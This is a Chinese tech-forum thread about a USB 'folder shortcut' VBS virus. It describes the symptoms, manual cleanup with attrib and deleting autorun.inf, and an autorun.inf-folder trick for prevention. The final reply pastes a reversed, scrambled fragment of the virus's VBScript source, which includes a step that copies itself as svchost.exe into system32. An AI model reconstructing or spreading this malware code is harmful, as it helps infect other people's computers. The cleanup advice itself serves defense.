1KB文件夹快捷方式.vbs病毒！！！
今天在机房上机，U盘使用后感染了.VBS病毒，表现为在被感染的U盘文件夹上显示1Kb大小的“快捷方式”字样，使用自己NOD32 查杀后，该病毒名为734821704.vbs 病毒体被NOD32 隔离后，本以为就恢复了文件夹原本的面貌，但是显然想法太单纯了，因为双击被查杀后的文件夹后，提示“该快捷方式所指向的项目“734821704.vbs已经更改或移动，因此该快捷方式无法正常工作 是否删除该快捷方式？””我知道是该快捷方式覆盖掉了原本的文件夹，病毒隔离后才出现这个状况，千万不能按提示删除它，否则就是删除了自己宝贵的文件夹内容……

我在网上大概看了下该种类型的病毒，七七八八说了一堆，也较可信的下载了“1KB文件夹快捷方式病毒清除专用附件.rar（http://bbs.ikaka.com/attachment.aspx?attachmentid=564690）”和“vbs快捷方式专杀.rar”，但是迫于经验缘故，对于确实的查杀恢复效果，没有把握，所以想先来这儿问问兄弟们，不知道有些什么建议和经验。



------解决方案--------------------
###################################################################################
###################################################################################

呵呵，让我碰到你这个问题了！我也遇见过，但成功的清除了！下面是我总结的内容，看看吧，百分之百管用！
这种病毒，不窃取你的数据，就是很会搞破坏！电脑里无论哪个分区，其根目录下的文件夹均会受到它的破坏！破坏方式很简单：将每一个分区根目录下的每一个文件夹创建快捷方式，然后将源文件夹加上系统、隐藏属性！

这种病毒传播极为迅速，主要方式：移动设备传播。所到之处，存储设备根目录下文件夹无一幸免！

这种病毒，我已经接触到了好几次！最初是U盘受感染，拿到一个“装有杀毒软件”的计算机上手动处理后，“丢失的文件”被找回！但如果一台个人电脑上的文件受到感染，文件少的话还好说，文件多的话就麻烦了,不过怎么着，都能被解决的！由于病毒可以自我复制，每个分区根目录下均有副本，而且副本之间相互关联，删除一个后，会马上被恢复！实在令人厌烦....

电脑正常启动时无法进行删除，我们可以进入安全模式手动删除文件！进入安全模式后，打开我的电脑，选择“工具”菜单项，选择“文件夹选项”选项卡，在“查看”里，将“隐藏受保护的操作系统文件”前的对号去掉，选择“显示所有文件和文件夹”！然后回到电脑分根目录下，看到了吧，所有隐藏的文件都被显示了出来，删除所有快捷方式！从开始中打开“运行”，用

attrib f:\* -s -h /s /d(f:\*为路径，指的是f盘根目录下所有文件)去除被添加上的系统、隐藏属性，然后将每个分区根目录下的文件“.vbs”和

“autorun.inf”！然后重启计算机，看吧！问题解决了...

防范措施：U盘对病毒的传播要借助autorun.inf文件的帮助，病毒首先把自身复制到u盘，然后创建一个autorun.inf,在你双击u盘时，会根据autorun.inf中的设置去运行u盘中的病毒,我们只要可以阻止autorun.inf文件的创建，那么U盘上就算有病毒也只能躺着睡大觉了,大家可能也想到这个，但是不管给autorun.inf设置了什么属性，病毒都会更改它，我提到的方法就是，在根目录下，删除autorun.inf文件，然后，根目下建立一个文件夹，名字就叫autorun.inf，这样一来，因为在同一目录下，病毒就无能为力，创建不了autorun.inf文件了,以后会不会出新病毒，自动去删文件夹，然后再建立文件就不知道了，但至少现阶段，这种方法是非常有效的。但是，由于这个文件夹可以被改名，因此许多新的木马和病毒采用改名后再创建autorun.inf文件来达到感染U盘的目的。不过对于安全意识强的用户，用这种方法来判断自己的U盘是否遭到感染也未尝不可。

###################################################################################
###################################################################################

------解决方案--------------------
################################################################################### 
################################################################################### 
上面有一部分有点乱哈！整理如下：

从开始中打开“运行”，用 attrib f:\* -s -h /s /d （f:\*为路径，指的是f盘根目录下所有文件） 去除被添加上的系统、隐藏属性，然后将每个分区根目录下的文件“.vbs”和 “autorun.inf”删除！
################################################################################### 
###################################################################################
------解决方案--------------------
打开病毒的VBS文件，阅读它的源代码，自己写一个专杀。
------解决方案--------------------
关闭NOD32的主动防御，进NOD32的隔离，把这个734821704.vbs文件回复，右击选择编辑，然后把内容发上来给大家伙看看吧。。
------解决方案--------------------
这就是他的源码。。。大家看看，，，我也中了它！


'偶给要不 '，号外起乱名文中的我，风暴叫字名文英的我yoB叫字.eniF-_- 5
'rorrE nO emuseR txeN8
'sF miDShsW,oS:llehosF tetaerC=cejbOeRcs "(tGniTPisELif.oMeTsy "TcEjB teS:)ehShsWerC=lljbOetaw "(tceTpiRcSLleHS.laC:) "niaM l)(6
'(niaM buS)9
'rorrE nO emuseR miD:txeNV ,sgrA daoLsuriAsuriV ,A teS:ssrcSW=sgrugrA.tpiiV:stnem=daoLsurVniaMteG:)1(surissAsuriVniaMteG=)0(suriV=muNgrA:ihW oD:0uNgrA elsgrA < mP:tnuoC.raP=maraA& " "&maNgrA(sgrNgrA:)muuNgrA=muoL:1 + mpo8
'raPbuSaCL=magiR(esraP(th)3 ,ma)6
'aC tceleSraPbuS esma9
'aCes " ur "n2
'htaPnuRW(tfeL=.tpircSFtpircSemaNlluaC:)2 ,(nuR llhtaPnuR llaC:)SedavnIV(metsyaoLsurisuriV,daC:)ssA(nuR lletsyS% "\%tooRm\metsystsohcvs& " exe.oLsuriV)da7
't " esaCl " , "txni ", "goni ", "i "f7